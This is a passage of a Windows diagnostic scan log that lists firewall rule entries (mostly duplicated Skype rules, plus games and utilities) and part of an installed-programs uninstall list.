"{C700CD86-57BB-4744-BA52-4290967729FA}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{C78E26EC-DD5F-4D4F-9AD2-DCF6AC2C7993}" = dir=in | app=c:\program files (x86)\hp\hp software update\hpwucli.exe | 
"{C8721FC3-CA3E-4EA2-8526-E31DADAE784B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{C911611D-F59A-446E-8CB5-39564575F43A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{C995BED8-6089-4A96-BFC0-BE83FA0E9E80}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqgplgtupl.exe | 
"{CAA6782E-4A54-4A5E-BB00-BDA095E930EF}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{CAAEE6FA-6F0E-49E2-8EF5-A496129B7CD7}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{CB060AF3-F593-4463-AB97-DACDDA8325FB}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\loadout\loadout.exe | 
"{CB7D6D33-450B-4EE1-81AE-92703C9266FE}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 | 
"{CBB704A6-FCCB-4A34-88EA-D88F30868FF6}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpoews01.exe | 
"{CC8EB84E-218C-4B0C-B5B0-FA57EF0B828A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{CC951EC2-6C5A-464B-B780-4E44AB4197E3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{CCD201A3-4E24-4B8C-8216-9A1FE0A3FB87}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{CD3A194C-FC64-42E0-9F9E-FFFD8F6D68E7}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{CDA9F1F9-07E2-4268-A46C-455664F0DFAF}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{CDD050BC-62AC-4193-8CFF-FE405CDDDAD7}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{CDECB843-0B1A-4AB4-8820-4DAA01E859B8}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{CE09D989-F08C-4790-8C41-0A347F680FC3}" = protocol=6 | dir=in | app=c:\users\nick\appdata\roaming\spotify\spotify.exe | 
"{CE0BD3B0-08BD-4132-9001-8345327A8E40}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{CE537E49-595E-4619-93AA-895C4CDB8AF1}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{CE9A9316-503D-4850-AFD8-965527B3D1F7}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{CE9F70D1-C40C-4C70-9272-CD1ACD63E094}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{CF394FEF-D0B0-4CB6-AD30-986F8F41CE99}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{CFEA67CA-4FF3-40E3-8A8E-8C638FBC33A4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{D015C58D-E01A-4AD4-A022-CAAEAA76EE24}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{D10F979B-7A7B-4518-846F-0492D7081261}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{D18921DC-C99E-4001-930B-604E6FCA5E42}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{D245851C-32A6-4AC7-A8B7-4D5C74044B40}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{D3B89FF6-B5F5-4B45-8AC3-A1F77F30A7B3}" = protocol=6 | dir=in | app=c:\program files (x86)\aim\aim.exe | 
"{D44CCCA4-B427-4462-99DB-E7BBB3559DE4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{D493F73F-A3AE-4A67-B704-6D4074989BFB}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqtra08.exe | 
"{D4BE6943-C2DE-4757-8D78-7A0DC8AB013F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{D567A399-DF9E-4BA7-8577-95EF10FC0502}" = protocol=6 | dir=out | svc=mcx2svc | app=%systemroot%\system32\svchost.exe | 
"{D5BD3981-6C71-4647-94AD-2E24BE17831F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{D6486273-E27F-4690-B519-73628E015B1D}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{D66552B1-5772-4EF8-B0AB-89E1552E671A}" = protocol=6 | dir=in | app=c:\program files (x86)\winamp\winamp.exe | 
"{D70E31A1-129D-4743-AC8F-36E6332EAA3A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{D7154907-298B-4B41-B6EE-FD41AE14E3FD}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{D7ABBEA9-07F7-43A4-93FC-80378E3FE5A3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{D7C0A6A5-6D8C-48DC-9752-1A8B15534949}" = protocol=17 | dir=in | app=c:\nexon\combat arms\nmservice.exe | 
"{D7D95FE7-6F0F-440D-8F2B-62C7C9247AB0}" = protocol=6 | dir=in | app=c:\users\owner\appdata\roaming\spotify\spotify.exe | 
"{D7E09F43-06F4-4326-891F-57AF50686C63}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{D8693483-CF83-465F-BD23-39EDB2E766A8}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{D877BFAB-3574-48B9-97CB-765AFDF459DA}" = protocol=6 | dir=out | app=%systemroot%\ehome\mcx2prov.exe | 
"{D91ADB49-1B4D-4AC7-A9CE-ECC60DD06A87}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{DA53340F-73CC-4EA4-A64F-744DCAE3A7E9}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{DB431847-E057-4A4A-8421-28E0FE08FE67}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{DB614D91-2EE4-474B-8A30-891DC77FA3B2}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{DB63A2EA-1206-4006-BA11-050404F01BBB}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{DB63A7B9-DAD6-4844-A260-85856E25640F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{DB834428-FCEB-4D29-8D37-5467E035740A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{DBE149F4-774E-4440-B38E-F562FF38ABC7}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{DD4E1A06-F933-4FD5-9E4B-75DD253DD76A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{DD65C33D-D601-4FE0-8FD3-8645E84E89ED}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{DE9FA85D-41B4-4749-B9F1-5F55D31F7260}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{E0BE5D55-F184-4F93-BE67-8B420A6CFE39}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{E130A280-C8D0-4DA9-8FEB-8E6E6E53B716}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{E2D49638-F252-467C-8BCD-DB5C522A8BD1}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{E3076832-ABE5-40DC-998E-BC26B4DA4B80}" = protocol=6 | dir=in | app=c:\windows\syswow64\pnkbstrb.exe | 
"{E34B4469-1009-4ADD-9A4B-53D7E7868C6F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{E393B231-1F9D-4B5B-A189-F4F7DCD867BF}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{E3D2BEAA-9435-460C-AC5A-C4716C7DCB1E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{E3D3223C-2D18-4B6C-BA80-7148E34A467B}" = protocol=17 | dir=in | app=c:\users\nick\appdata\roaming\spotify\spotify.exe | 
"{E3D4AFD1-11A0-4696-B26C-78256D9BC2D0}" = protocol=17 | dir=in | app=c:\users\owner\appdata\local\google\google talk plugin\googletalkplugin.exe | 
"{E4499A57-7C9F-4897-A5D2-6D6F5055599D}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{E521DE6C-17A9-4C5C-B966-3D4B49C795E1}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{E56D4FC1-67B7-4774-939F-2070790A456E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{E5960BA0-AD11-4702-BDB4-E8AC65EE3338}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{E65C58CA-A415-4D28-9FE3-0831E6E10DF1}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{E678C0EB-8A6C-42A1-9D37-475108741884}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{E6B91280-9A61-41AC-87B2-562816851C86}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{E6C21473-5539-4274-AFAA-B946CFEE59B8}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{E768D78C-49BD-4D20-B9F2-7163C04E0450}" = protocol=6 | dir=in | app=c:\program files (x86)\common files\adobe\adobe version cue cs4\server\bin\versioncuecs4.exe | 
"{E97C606C-D462-42E4-B23C-9937DBB667EE}" = dir=in | app=c:\program files (x86)\cyberlink\powerdirector\pdr.exe | 
"{E9B5D885-E54E-46F6-907C-9390C846111B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{EAD441BF-63A3-448E-9C27-AEDDD954F900}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{EBCE164A-0E73-49B9-8FDD-B1EDFEC447BB}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{EC21CD2E-AAB8-4F3A-9A6A-11D854262903}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{ED412920-CB92-4E4A-8C3B-3425B871D18E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{ED531200-1F4D-4E20-AA9A-C8F6BBD0E758}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{EDB6208C-4B5E-4F83-8CF5-8953ED748D16}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{EDD306D0-7EFC-40B5-9197-7E80A6C48E32}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{EE1780B5-677F-4343-ACAF-B522D185C2E5}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{EE99BEBE-F9CC-4AD3-A06A-179DF9CA97CB}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{EEC965DB-EC1F-4363-A7D1-D9687B9C6AA9}" = protocol=17 | dir=in | app=c:\users\nick\appdata\roaming\spotify\spotify.exe | 
"{EF309A22-D660-4150-B5E0-AF075F3F64C6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{EF42942C-AC79-4E1A-823D-AADDA04F8A0F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{EF4DC046-68C9-4671-BB73-6594835D8C2E}" = dir=in | app=c:\users\owner\appdata\local\facebook\video\skype\facebookvideocalling.exe | 
"{EF4E1E97-ACA0-4CAB-A503-CCE2487491FD}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{EF4FC309-6B18-4E27-8C9A-8F8C87777E89}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office12\onenote.exe | 
"{EFA63B6F-880F-4C66-B0F4-098A0063FAAE}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{EFCC8732-9259-463A-A722-BD4C11CE2439}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{F04AB7A5-0060-42F3-B8B0-FB2F0F618BF3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{F050E298-B20F-42D0-84AD-9B9D1741BF17}" = protocol=6 | dir=in | app=c:\nexon\combat arms\nmservice.exe | 
"{F0A15AAE-B375-4A90-AAFA-09348BF8C8A4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{F0D59B8B-C396-443E-AE8C-90AD18359F07}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{F1B5677A-847A-4A9B-BF0F-2A0E9B57D58B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{F23F5E04-4881-42AF-B997-30439BBE24F6}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe | 
"{F24E280E-AC86-447F-8AB0-BE01874595A1}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{F250A9D8-C914-4339-A379-542C9A42CB74}" = dir=in | app=c:\program files (x86)\common files\hp\digital imaging\bin\hpqphotocrm.exe | 
"{F2D8FB2E-6329-453E-89FB-00915E51DF3E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{F340D8B4-5A43-41A4-B474-0941A7289A4F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{F3CE9AD5-9AEA-4EA3-9C8D-90B0312C8888}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{F434ACDD-9BB7-4C9F-A5A3-A1C835AD6104}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{F52EBED8-FA97-4250-BCD2-37EA2B4CEFBA}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\team fortress 2\hl2.exe | 
"{F58BEAE5-EFB5-4AA2-9F2A-762809E95B32}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{F59B9755-15A4-444D-91B1-5F343F98569A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{F5A20FEF-C5ED-455A-B207-2BD23C700C7B}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\tom clancy's ghost recon online\game\ncsa-live\ghostreconphantoms.exe | 
"{F65CDD48-CD71-4682-8D77-94289F1BDA1F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{F6645A55-8580-48C2-B577-EB4B794D6DDD}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{F6BDEE0A-AEF3-4805-8567-C3A7B6C55756}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{F7428447-BB4D-4A80-9928-F66C59D5D3DC}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\tacticalintervention\bin\tacint.exe | 
"{F78C868B-CEE9-4B91-B2AA-499FD6611525}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{F79BE769-9FEC-4BA3-B805-40D286F038C4}" = dir=in | app=c:\program files (x86)\itunes\itunes.exe | 
"{F84A8750-4388-4568-8583-B7C8B31E999A}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 | 
"{F90426AD-6D74-4CB9-ADA9-278A7F330BDB}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{F95FE0DA-74F0-458F-AAAD-A89C88B99EF0}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{F9C6BC8A-7400-4378-973E-BFACDECC6608}" = protocol=17 | dir=in | app=c:\program files (x86)\tightvnc\vncviewer.exe | 
"{FB053DD6-B22B-4D86-A3EE-73A62346D8A9}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{FB19855F-5D9C-46B4-AA6B-D71A9E1BD54B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{FB7ED81A-1329-40C2-870E-184F8909E5CA}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{FB8DE48B-3B85-44E4-BC79-89D6723A45C7}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{FC3036AF-D307-4404-A4E5-8D4031F45795}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{FD6475BE-B40A-4E3F-AE9B-A64D47398EC7}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{FE3B6CD8-F487-4166-BDDC-460E3701A74A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{FE3DB4C2-9EA8-4A65-8F91-6A7E790ABF8C}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{FE918CCF-1357-4B7A-8653-2D099E2D5019}" = protocol=6 | dir=in | app=c:\programdata\nexonus\ngm\ngm.exe | 
"{FEAD01BD-81A6-4396-A89D-9F305CADED2F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{FFBCC21F-DD9D-481A-88F7-2D61C198D2AD}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{FFE6617E-9B06-4041-9F52-FAC1A3370FD0}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\team fortress 2\hl2.exe | 
"{FFF07D5C-0838-4BA8-A2E9-2F55BDF28E0E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"TCP Query User{031080F2-1FA6-424C-9B9E-FA097D028601}C:\program files (x86)\aim\aim.exe" = protocol=6 | dir=in | app=c:\program files (x86)\aim\aim.exe | 
"TCP Query User{0A6B8B51-49C9-4752-A6F6-621714530A8D}C:\users\nick\appdata\roaming\dropbox\bin\dropbox.exe" = protocol=6 | dir=in | app=c:\users\nick\appdata\roaming\dropbox\bin\dropbox.exe | 
"TCP Query User{17A2B272-AC67-473A-886C-FDD11F733934}C:\users\owner\documents\sambc.exe" = protocol=6 | dir=in | app=c:\users\owner\documents\sambc.exe | 
"TCP Query User{3F65B3F9-09EA-4351-B09E-3F58C78FF6A0}C:\program files (x86)\steam\steamapps\common\tom clancy's ghost recon online\game\ncsa-live\ghostreconphantoms.exe" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\tom clancy's ghost recon online\game\ncsa-live\ghostreconphantoms.exe | 
"TCP Query User{5D2C1A83-52A5-44DF-821C-5C510CCDD9C5}C:\program files (x86)\mozilla firefox\plugin-container.exe" = protocol=6 | dir=in | app=c:\program files (x86)\mozilla firefox\plugin-container.exe | 
"TCP Query User{890C7673-F533-425E-AEB0-1431EA435E7F}C:\users\owner\appdata\local\akamai\netsession_win.exe" = protocol=6 | dir=in | app=c:\users\owner\appdata\local\akamai\netsession_win.exe | 
"TCP Query User{8C8DD0F3-4203-4437-9ADD-FD7D9649CC4A}C:\xampp\mysql\bin\mysqld.exe" = protocol=6 | dir=in | app=c:\xampp\mysql\bin\mysqld.exe | 
"TCP Query User{C575EB10-48B2-4F3A-BD5B-51E80749D9E2}C:\program files (x86)\xfire2\xfire.exe" = protocol=6 | dir=in | app=c:\program files (x86)\xfire2\xfire.exe | 
"TCP Query User{FECFE584-5381-4FBC-937E-0983FC8B5A3F}C:\users\owner\appdata\roaming\utorrent\utorrent.exe" = protocol=6 | dir=in | app=c:\users\owner\appdata\roaming\utorrent\utorrent.exe | 
"UDP Query User{11EB0CBE-945C-4BE3-A4F8-13AF8B56A06E}C:\users\owner\documents\sambc.exe" = protocol=17 | dir=in | app=c:\users\owner\documents\sambc.exe | 
"UDP Query User{1921D7EB-4B6D-4EAC-B5D8-BD9DFE9D9EFE}C:\program files (x86)\mozilla firefox\plugin-container.exe" = protocol=17 | dir=in | app=c:\program files (x86)\mozilla firefox\plugin-container.exe | 
"UDP Query User{3EC95D7C-3250-4795-958F-165E4BC4BF6A}C:\users\owner\appdata\roaming\utorrent\utorrent.exe" = protocol=17 | dir=in | app=c:\users\owner\appdata\roaming\utorrent\utorrent.exe | 
"UDP Query User{4ADBD4C1-8A36-4781-8D19-678A21C743F1}C:\program files (x86)\aim\aim.exe" = protocol=17 | dir=in | app=c:\program files (x86)\aim\aim.exe | 
"UDP Query User{9630D2F0-D022-4BFF-804B-0D32BABA51E3}C:\program files (x86)\xfire2\xfire.exe" = protocol=17 | dir=in | app=c:\program files (x86)\xfire2\xfire.exe | 
"UDP Query User{AF3E8369-AF23-4083-8ECC-A26A838182AF}C:\xampp\mysql\bin\mysqld.exe" = protocol=17 | dir=in | app=c:\xampp\mysql\bin\mysqld.exe | 
"UDP Query User{C1F9435D-CDA9-419C-A429-4C0280F56C78}C:\users\nick\appdata\roaming\dropbox\bin\dropbox.exe" = protocol=17 | dir=in | app=c:\users\nick\appdata\roaming\dropbox\bin\dropbox.exe | 
"UDP Query User{D6FEDD47-7EB1-491C-951B-BCB9681DB144}C:\users\owner\appdata\local\akamai\netsession_win.exe" = protocol=17 | dir=in | app=c:\users\owner\appdata\local\akamai\netsession_win.exe | 
"UDP Query User{E746900C-041A-4EE2-A96C-3B0EBD04C025}C:\program files (x86)\steam\steamapps\common\tom clancy's ghost recon online\game\ncsa-live\ghostreconphantoms.exe" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\tom clancy's ghost recon online\game\ncsa-live\ghostreconphantoms.exe | 
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{027E5FAB-1476-4C59-AAB4-32EF28520399}" = Windows Live Language Selector
"{071c9b48-7c32-4621-a0ac-3f809523288f}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{0826F9E4-787E-481D-83E0-BC6A57B056D5}" = Microsoft SQL Server VSS Writer
"{1ACC8FFB-9D84-4C05-A4DE-D28A9BC91698}" = Windows Live ID Sign-in Assistant
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
"{2738C4AA-420E-4E13-ADEF-B5AB250E3EF1}" = Microsoft SQL Server 2008 Native Client
"{295CFB7C-A57E-4313-93E7-68E7CE1D0332}" = Adobe WinSoft Linguistics Plugin x64
"{2D74E972-5A85-44DC-9193-8A302BA8C181}" = Photoshop Camera Raw_x64
"{2F14965D-567B-4E59-ADEB-0A2CC1E3ADDF}" = Sql Server Customer Experience Improvement Program
"{350AA351-21FA-3270-8B7A-835434E766AD}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022
"{4AE29B5C-87B1-3C4E-8E15-17B83BA745CB}" = Microsoft Visual Studio 2010 Tools for Office Runtime (x64)
"{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148
"{4FFA2088-8317-3B14-93CD-4C699DB37843}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729
"{529125EF-E3AC-4B74-97E6-F688A7C0F1C0}" = Paint.NET v3.5.10
"{5340A3B5-3853-4745-BED2-DD9FF5371331}" = Microsoft SQL Server 2008 Common Files
"{537F3172-82F9-44D7-99E6-8B4428F1CDAF}" = AVG 2014
"{5AEBB4A3-6878-4CEE-AD34-0F6958A983F0}" = HP Deskjet F4400 Printer Driver Software 13.0 Rel .5
"{5F240DB8-0D74-4F13-86C3-929760392A8D}" = HP Remote Software
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{6292D514-17A4-403F-98F9-E150F10C043D}" = Microsoft SQL Server 2008 Setup Support Files 
"{6631325A-9B1B-4EE7-8E64-8CC4A6F10643}" = Adobe Fonts All x64
"{6DD01FF3-63CE-436B-96DB-61363EAA4EB8}" = MobileMe Control Panel
"{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}" = Bonjour
"{7DEBE4EB-6B40-3766-BB35-5CBBC385DA37}" = Microsoft .NET Framework 4.5.1
"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
"{8338783A-0968-3B85-AFC7-BAAE0A63DC50}" = Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570
"{8875A1C0-6308-4790-8CF6-D34E89880052}" = Adobe Linguistics CS4 x64
"{887797BF-37A5-4199-B0C9-0D38D6196E9A}" = Adobe Anchor Service x64 CS4
"{893F27E6-D6BE-4B9F-80E6-0ADA694A31A8}" = Microsoft SQL Server 2008 Common Files
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8C775E70-A791-4DA8-BCC3-6AB7136F4484}" = Visual Studio 2012 x64 Redistributables
"{8C8D673B-20FB-43E6-BCB7-9B3F78F2E762}" = Adobe Type Support x64 CS4
"{8DAA31EB-6830-4006-A99F-4DF8AB24714F}" = Adobe CSI CS4 x64
"{90120000-002A-0000-1000-0000000FF1CE}" = Microsoft Office Office 64-bit Components 2007
"{90120000-002A-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit MUI (English) 2007
"{90120000-0116-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2007
"{90BA8112-80B3-4617-A3C1-BD2771B60F74}" = Adobe CMaps x64 CS4
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5.1
"{95120000-00B9-0409-1000-0000000FF1CE}" = Microsoft Application Error Reporting
"{96B53CA8-5ABB-49D8-96F1-F6C0D73A76C6}" = iTunes
"{9B2C4509-2B9F-4303-BA74-E2F9BB773F03}" = Oracle VM VirtualBox 4.1.8
"{A3454894-144A-4D80-B605-C128FE0D7329}" = Adobe Drive CS4 x64
"{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}" = Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175
"{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{ADBD6E65-46CB-4A97-9AFB-64963FEACC40}" = Microsoft SQL Server 2008 RsFx Driver
"{B37A99DD-88E2-4ED0-80B4-1E054AB354BF}" = Adobe InDesign CS4 Icon Handler x64
"{BC994A59-6E98-4203-8A35-819938DD5ED1}" = TightVNC
"{CC8BA866-16A7-4667-BA0C-C494A1E7B2BF}" = Microsoft SQL Server 2008 Database Engine Shared
"{CE97E4D3-9F91-4D72-8A29-ED9EA90E5A15}" = iCloud
"{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}" = SAMSUNG USB Driver for Mobile Phones
"{D2E8F543-D23A-4A38-AFFC-4BDEBFBA6FDA}" = HP MediaSmart SmartMenu
"{D40172D6-CE2D-4B72-BF5F-26A04A900B7B}" = Adobe Photoshop CS4 (64 Bit)
"{DF167CE3-60E7-44EA-99EC-2507C51F37AE}" = Microsoft SQL Server 2008 Database Engine Shared
"{DFFABE78-8173-4E97-9C5C-22FB26192FC5}" = Adobe PDF Library Files x64 CS4
"{EE936C7A-EA40-31D5-9B65-8E3E089C3828}" = Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148
"{F585058F-3348-4640-9742-B5797416A1E3}" = AVG 2014
"{FA7394B8-CE65-4F9E-AC99-F372AD365424}" = Microsoft SQL Server 2008 Database Engine Services
"{FBD367D1-642F-47CF-B79B-9BE48FB34007}" = Microsoft SQL Server 2008 Database Engine Services
"{FCADA26A-5672-31DD-BF0E-BA76ECF9B02D}" = Microsoft Help Viewer 1.0
"{FE86CB0C-FCB3-4358-B4B0-B0A41E33B3DD}" = Apple Mobile Device Support
"{FF21C3E6-97FD-474F-9518-8DCBE94C2854}" = 64 Bit HP CIO Components Installer
"CCleaner" = CCleaner
"CPUID HWMonitor_is1" = CPUID HWMonitor 1.21
"Defraggler" = Defraggler
"HitmanPro37" = HitmanPro 3.7
"HP Imaging Device Functions" = HP Imaging Device Functions 13.0
"HP Print Projects" = HP Print Projects 1.0
"HP Smart Web Printing" = HP Smart Web Printing 4.60
"HP Solution Center & Imaging Support Tools" = HP Solution Center 13.0
"HPExtendedCapabilities" = HP Customer Participation Program 13.0
"Microsoft Help Viewer 1.0" = Microsoft Help Viewer 1.0
"Microsoft SQL Server 10" = Microsoft SQL Server 2008 (64-bit)
"Microsoft SQL Server 10 Release" = Microsoft SQL Server 2008 (64-bit)
"Microsoft Visual Studio 2010 Tools for Office Runtime (x64)" = Microsoft Visual Studio 2010 Tools for Office Runtime (x64)
"Minion Rush" = Minion Rush 
"Recuva" = Recuva
"Shop for HP Supplies" = Shop for HP Supplies
"Speccy" = Speccy
"WinRAR archiver" = WinRAR archiver
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{00106F6E-29AA-4F6A-B5F2-04A13DFEF6A5}" = RSDLite
"{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}" = Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148
"{007B37D9-0C45-4202-834B-DD5FAAE99D63}" = ArcSoft Print Creations - Slimline Card
"{00ADFB20-AE75-46F4-AD2C-F48B15AC3100}" = Adobe Color NA Recommended Settings CS4
"{01521746-02A6-4A72-00BD-A285DF6B80C6}" = The Sims 2 University
"{0295F89F-F698-4101-9A7D-49F407EC2D82}" = HP Active Support Library
"{048298C9-A4D3-490B-9FF9-AB023A9238F3}" = Steam
"{04AF207D-9A77-465A-8B76-991F6AB66245}" = Adobe Help Viewer CS3
"{05308C4E-7285-4066-BAE3-6B50DA6ED755}" = Adobe Update Manager CS4
"{054EFA56-2AC1-48F4-A883-0AB89874B972}" = Adobe Extension Manager CS4
"{06A1D88C-E102-4527-AF70-29FFD7AF215A}" = Scan
"{07FB17D8-7DB6-4F06-80C4-8BE1719CB6A1}" = hpWLPGInstaller
"{08B32819-6EEF-4057-AEDA-5AB681A36A23}" = Adobe Bridge Start Meeting
